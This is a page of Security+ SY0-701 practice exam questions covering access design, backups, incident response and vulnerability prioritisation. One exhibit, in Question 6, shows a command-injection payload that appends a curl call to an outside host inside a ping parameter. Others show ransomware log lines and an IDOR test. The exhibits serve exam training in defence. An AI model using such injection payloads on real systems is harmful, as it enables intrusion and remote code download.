Back to Security+ SY0-701 questions

Scenario-based practice

Hard Difficulty Questions

Practise Security+ SY0-701 practice questions — original exam-style scenarios covering every exam domain, with detailed explanations, wrong-answer analysis, and common exam traps.

20
scenario questions
SY0-701
exam code
CompTIA
vendor

Scenario guide

How to approach hard difficulty questions

These are the questions most candidates get wrong. They require connecting multiple concepts, reading tricky output, or knowing edge-case behaviour that isn't on most study cards. Practising them trains you to operate under uncertainty — a necessary skill on the real exam.

Quick answer

Hard Difficulty Questions questions test whether you can apply the concept in context, not just recognise a definition.

How the topic appears in realistic exam-style scenarios.

Which detail in the question changes the correct answer.

How to eliminate plausible but wrong options.

How to connect the question back to the wider exam objective.

Related practice questions

Related SY0-701 topic practice pages

Scenario questions usually connect to one or more exam topics. Use these links to review the underlying concepts behind the scenario.

Practice set

Practice scenarios

Question 1hardmulti select
Full question →

An operations team manages Linux servers over SSH. The security team wants to stop direct management access from employee laptops, reduce lateral movement if one admin endpoint is compromised, and keep a log of every administrative session. Which two design choices best fit? Select two.

Question 2hardmultiple choice
Full question →

An order-entry application must survive a single server failure and continue serving users if the primary site becomes unavailable. Management wants automatic failover, but does not want to pay for fully active production capacity in two regions. Which design is best?

Question 3hardmultiple choice
Full question →

Based on the exhibit, what is the best handling decision for the requested file?

Exhibit

Data request:
File: customer_export.csv
Contents: full name, street address, SSN last 4, account balance, support notes
Requestor: external troubleshooting contractor

Policy excerpt:
- Internal: company staff only
- Confidential: encrypt in transit, approved recipients only
- Restricted: minimize, mask where possible, owner approval required, time-limited access, logged sharing
- Public: may be shared externally without restriction
Question 4hardmultiple choice
Read the full VPN explanation →

Based on the exhibit, what additional control is the best fit?

Current controls on the finance share: - SMB signing enabled - Weekly access review - Nightly backups to immutable storage - Antivirus scans at 02:00

Incident: a valid VPN account was used to access 40,000 files in 8 minutes and copy them to a local drive. Goal: detect unauthorized bulk access quickly before exfiltration completes.

Exhibit

Current controls on the finance share:
- SMB signing enabled
- Weekly access review
- Nightly backups to immutable storage
- Antivirus scans at 02:00

Incident: a valid VPN account was used to access 40,000 files in 8 minutes and copy them to a local drive.
Goal: detect unauthorized bulk access quickly before exfiltration completes.
Question 5hardmultiple choice
Full question →

Based on the exhibit, what is the best immediate action for the SOC or IR team?

A finance workstation shows evidence of a macro-launched script, followed by file renaming and lateral SMB traffic to two other hosts. The team has not yet determined the full scope of the incident.

Exhibit

Host: finance-lap07
10:22:11  winword.exe spawned powershell.exe -enc <redacted>
10:22:14  powershell.exe created C:\Users\ana\AppData\Roaming\rclone.exe
10:24:02  file rename activity: 184 files changed to *.locked
10:24:09  outbound SMB connections to 10.20.4.18 and 10.20.4.19
10:25:01  EDR status: endpoint still connected to corporate VPN
User report: 'My shared files stopped opening and the folder names changed.'
Question 6hardmultiple choice
Full question →

Based on the exhibit, what is the BEST remediation for the application flaw shown?

A user-controlled parameter is being passed to a shell command on the server. The application is intended to test connectivity to approved internal hosts only.

Exhibit

Application log excerpt:
15:08:02 POST /tools/pingHost host=10.0.0.15
15:08:02 Application executed: /bin/sh -c "ping -c 1 10.0.0.15"
15:09:11 POST /tools/pingHost host=10.0.0.15;curl%20http://198.51.100.55/s
15:09:11 Application executed: /bin/sh -c "ping -c 1 10.0.0.15;curl http://198.51.100.55/s"
15:09:12 Outbound HTTPS session established to 198.51.100.55
Question 7hardmultiple choice
Full question →

Based on the exhibit, which document type should be updated to make the approval and retention requirements mandatory across the organization?

Exhibit

Current document excerpt:
- Managers may approve external file sharing by email.
- Employees should keep the approval email in their inbox.
- Help desk records exceptions if time allows.
Audit note:
- No consistent evidence of approval or exception retention was found across departments.
Management objective:
- External sharing exceptions must be approved, retained, and auditable in a consistent way.
Question 8hardmultiple choice
Full question →

Based on the exhibit, what is the best next step before the hotfix is released?

Exhibit

Emergency change request CHG-8841
Service: Customer portal login API
Reason: critical authentication bug causing lockouts

Pipeline status:
- Code review: pending
- Automated unit tests: skipped to save time
- Integration tests: failed once and were not rerun
- Rollback plan: not documented
- Approval: verbal yes from operations supervisor
- Deployment window: 21:30-22:00 tonight
Question 9hardmultiple choice
Full question →

Based on the exhibit, which access change best follows least privilege while still allowing the help desk to complete the task?

Exhibit

Access request:
Requester: helpdesk_27
Task: reset one user's MFA enrollment and unlock one locked account
Current access:
- Helpdesk_ReadOnly: view user details only
- Helpdesk_Admin: unlock accounts and reset MFA for assigned tickets
- Domain_Admin: full server and directory administration

Proposal:
- Add helpdesk_27 to Domain_Admin for 7 days so the ticket can be completed quickly.
Question 10hardmultiple choice
Full question →

Based on the exhibit, which change best improves both recovery time and recovery point for the ERP database?

A mid-sized company has a two-hour RTO and a 30-minute RPO, but its current backup design cannot meet either objective during restore testing.

Exhibit

System: ERP database cluster
Business requirements:
- RTO = 2 hours
- RPO = 30 minutes
Current recovery design:
- Nightly full backup at 23:00 to onsite NAS
- Differential backup at 12:00
- Weekly copy replicated to cloud on Sundays
Restore test results:
- Cold rebuild of VM + database restore: 5 hours 40 minutes
- Data gap since last backup: 2 hours 18 minutes
- NAS is online and joined to the same domain as production servers
Question 11hardmultiple choice
Full question →

During routine checks, configuration management finds several branch firewalls drifted from the approved baseline because a contractor changed settings locally. An automation job now compares each device nightly and automatically reapplies the approved configuration without waiting for a human ticket. Which control type is the automation?

Question 12hardmultiple choice
Read the full DNS explanation →

Based on the exhibit, what is the MOST likely explanation for the network traffic?

The affected host is not showing a large amount of internet-bound traffic, but its DNS behavior is highly unusual.

Exhibit

DNS query log excerpt:
Host: CORP-LT-17
16:18:02 a9f3d1k2d.update-check.com A NXDOMAIN
16:18:03 b7p9q2s1n.update-check.com A NXDOMAIN
16:18:04 k8z1m4c7r.update-check.com A NXDOMAIN
16:18:05 u3n6t9x0v.update-check.com A NXDOMAIN
16:18:06 9q2m7a4p1.update-check.com A NXDOMAIN

Proxy log excerpt:
No corresponding HTTP or HTTPS sessions observed
TTL observed: 60 seconds on all queries
Question 13hardmultiple choice
Full question →

Company-owned tablets are used by field staff for both corporate email and approved personal apps. Security must isolate company data from personal data, allow remote wipe of only the corporate workspace, and block access if the device is rooted or encryption is disabled. Which approach best fits?

Question 14hardmultiple choice
Full question →

Based on the exhibit, which security principle is the proposed workflow most directly enforcing?

Exhibit

Firewall rule change #4219:
- Requested by: NetworkOps1
- Approved by: NetworkOps1
- Implemented by: NetworkOps1
- Audit note: the same person can create, approve, and deploy production firewall changes.
Proposed redesign:
- Engineer drafts the change.
- Security reviewer approves it.
- A different administrator implements it during a maintenance window.
- The change ticket is visible only to the people assigned to the task.
Question 15hardmultiple choice
Full question →

Based on the exhibit, which change best improves recovery resilience against a repeat ransomware incident?

Exhibit

Current backup design:
- Production file server backs up nightly at 23:00 to NAS-Backup over SMB.
- NAS-Backup is mounted read/write to the file server 24x7.
- Weekly copy job replicates NAS contents to cloud object storage.
- Backup credentials are shared with the server admin group.
- Last restore test: 14 months ago.
Incident summary:
- Ransomware encrypted production files and then encrypted the NAS share using the same credentials.
Question 16hardmultiple choice
Full question →

Based on the exhibit, which issue should be remediated first by the operations team?

A small company has limited maintenance windows and can address only one of several findings this week.

Exhibit

Weekly vulnerability report:

1. vpn-gw01
   - Exposure: Internet-facing
   - Finding: Critical remote code execution
   - Notes: Vendor patch available; reboot required

2. db-lab02
   - Exposure: Internal only
   - Finding: High-severity authentication bypass
   - Notes: Isolated lab subnet; no sensitive data; no route to production

3. printsrv03
   - Exposure: Internet-facing administrative portal
   - Finding: Medium-severity outdated firmware
   - Notes: Vendor has not released a fix yet; temporary ACL blocks the admin port from the internet
Question 17hardmultiple choice
Full question →

Based on the exhibit, which key management improvement best preserves recoverability if the primary backup server is lost?

Exhibit

Backup job design
- Generate a random AES key to encrypt 8 TB of archive data
- Encrypt the AES key with the backup server’s public key
- Store the encrypted AES key alongside the archive
- Secondary site must restore the data if the primary backup server is unavailable
- Current design stores the corresponding private key only on the primary server
Question 18hardmultiple choice
Full question →

Based on the exhibit, which issue should be remediated FIRST?

The team can only fully fix one issue today. Management wants the choice that best reduces real-world risk, not just the highest severity score.

Exhibit

Vulnerability scan summary:

1) Internet-facing VPN appliance
   CVSS: 8.8
   Exploit status: public proof-of-concept available
   Exposure: reachable from the internet
   Compensating controls: none

2) Internal HR file server
   CVSS: 9.8
   Exploit status: no public exploit yet
   Exposure: reachable only from the employee VLAN
   Compensating controls: segmented network and MFA for admin access

3) Lab workstation
   CVSS: 10.0
   Exploit status: public exploit available
   Exposure: isolated lab VLAN with no routing to production

4) DMZ reporting server
   CVSS: 7.5
   Exploit status: public exploit available
   Exposure: internet-reachable, but protected by WAF and IP allowlisting
Question 19hardmulti select
Full question →

During testing of a shopping portal, a POST request to /api/address/update succeeds even when the anti-CSRF token is removed. In a separate test, changing customerId=1842 to customerId=1843 in a GET request returns another user's invoice data. Which two vulnerabilities are present? Select two.

Question 20hardmulti select
Full question →

EDR reports that a workstation launched PowerShell from a word processor, created a scheduled task named WinUpdateSvc, and began making repeated HTTPS connections to a rare external domain. The user is still logged in to several cloud apps. Which two response actions are best to initiate from the EDR console? Select two.

These SY0-701 practice questions are part of Courseiva's free CompTIA certification practice question bank. Courseiva provides original exam-style SY0-701 questions with detailed explanations, topic-based practice, mock exams, readiness tracking, and study analytics.